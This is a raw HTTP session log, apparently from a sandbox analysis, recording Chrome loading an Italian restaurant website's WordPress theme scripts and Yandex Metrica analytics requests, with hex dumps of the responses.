                                                                                                                                              2025-01-03 16:33:06 UTC2212OUTGET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr%2814%29clc%280-0-0%29rqnt%281 [TRUNCATED]
                                                                                                                                              Host: mc.yandex.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://www.cipassoitalia.it
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi
                                                                                                                                              2025-01-03 16:33:07 UTC819INHTTP/1.1 200 Ok
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                              Access-Control-Allow-Origin: https://www.cipassoitalia.it
                                                                                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              Connection: Close
                                                                                                                                              Content-Length: 603
                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Expires: Fri, 03-Jan-2025 16:33:07 GMT
                                                                                                                                              Last-Modified: Fri, 03-Jan-2025 16:33:07 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              2025-01-03 16:33:07 UTC603INData Raw: 7b 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 61 75 74 6f 5f 67 6f 61 6c 73 22 3a 30 2c 22 62 75 74 74 6f 6e 5f 67 6f 61 6c 73 22 3a 30 2c 22 63 5f 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 2c 22 66 6f 72 6d 5f 67 6f 61 6c 73 22 3a 30 2c 22 70 63 73 22 3a 22 31 22 2c 22 77 65 62 76 69 73 6f 72 22 3a 7b 22 61 72 63 68 5f 74 79 70 65 22 3a 22 6e 6f 6e 65 22 2c 22 64 61 74 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 32 20 30 31 3a 32 38 3a 32 35 22 2c 22 66 6f 72 6d 73 22 3a 31 2c 22 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 7d 2c 22 73 62 70 22 3a 20 7b 22 61 22 3a 22 49 48 66 2f 68 7a 45 66 32 43 65 56 33 69 44 43 49 51 39 50 53 2b 50 35 4f 67 35 2f 57 35 6f 57 72 53 4e 6f 51 43 38 74 49 53 76 68 58 77 6e 42 77 78 53 4e 62 79 2b 52 71 55 50 7a 42 71 49 79 22
                                                                                                                                              Data Ascii: {"settings":{"auto_goals":0,"button_goals":0,"c_recp":"1.00000","form_goals":0,"pcs":"1","webvisor":{"arch_type":"none","date":"2024-12-22 01:28:25","forms":1,"recp":"1.00000"},"sbp": {"a":"IHf/hzEf2CeV3iDCIQ9PS+P5Og5/W5oWrSNoQC8tISvhXwnBwxSNby+RqUPzBqIy"


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              133192.168.2.164986389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC536OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2974
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC2974INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 42 69 67 20 4e 75 6d 62 65 72 20 61 6e 69 6d 61 74 69 6f 6e 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 2f 2f 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Big Number animation shortcode javascript// -------------------------------------------------------------------------------------------(function($){//


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              134192.168.2.164986589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC540OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 11409
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC11409INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 76 69 61 20 41 4a 41 58 20 50 6f 72 74 66 6f 6c 69 6f 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 24 2e 61 76 69 61 5f 75 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Avia AJAX Portfolio// -------------------------------------------------------------------------------------------(function($){ "use strict";$.avia_ut


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              135192.168.2.164986489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC544OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 908
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC908INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 50 72 6f 67 72 65 73 73 20 62 61 72 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Progress bar shortcode javascript// ------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              136192.168.2.164986687.250.251.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC600OUTGET /sync_cookie_image_check HTTP/1.1
                                                                                                                                              Host: mc.yandex.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:08 UTC527INHTTP/1.1 302 Moved temporarily
                                                                                                                                              Connection: Close
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Location: https://mc.yandex.ru/sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.THIYYAEe98v2mU_77etvw6y980yLbM-16KV3AOlKlsqX0zDes6MVlFAFoFiiYNqR.FjbGmflqlBBumniBfAOlX96YIeU%2C
                                                                                                                                              Set-Cookie: sync_cookie_csrf=962763166fake; Expires=Fri, 03-Jan-2025 16:43:07 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              2025-01-03 16:33:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              137192.168.2.164986989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC725OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 7238
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC7238INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0d 0a 7b 20 0d 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0d 0a 09 0d 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 09 2f 2f 20 54 61 62 20 53 65 63 74 69 6f 6e 0d 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 09 0d 0a 09 24 2e 66
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// Tab Section// -------------------------------------------------------------------------------------------$.f


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              138192.168.2.164986789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC560OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 8442
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC8442INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 76 69 61 63 63 6f 72 64 69 6f 6e 20 53 6c 69 64 65 73 68 6f 77 20 0a 2f 2f 20 0a 2f 2f 20 61 63 63 6f 72 64 69 6f 6e 20 73 6c 69 64 65 72 20 73 63 72 69 70 74 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){"use strict";// -------------------------------------------------------------------------------------------// Aviaccordion Slideshow // // accordion slider script// ---------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              139192.168.2.164986889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC711OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 3676
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC3676INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 54 61 62 20 53 68 6f 72 74 63 6f 64 65 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 09 24 2e 66 6e 2e 61 76 69 61 5f 73 63 5f 74
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Tab Shortcode// -------------------------------------------------------------------------------------------(function($){ "use strict";$.fn.avia_sc_t


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              140192.168.2.164987089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC727OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
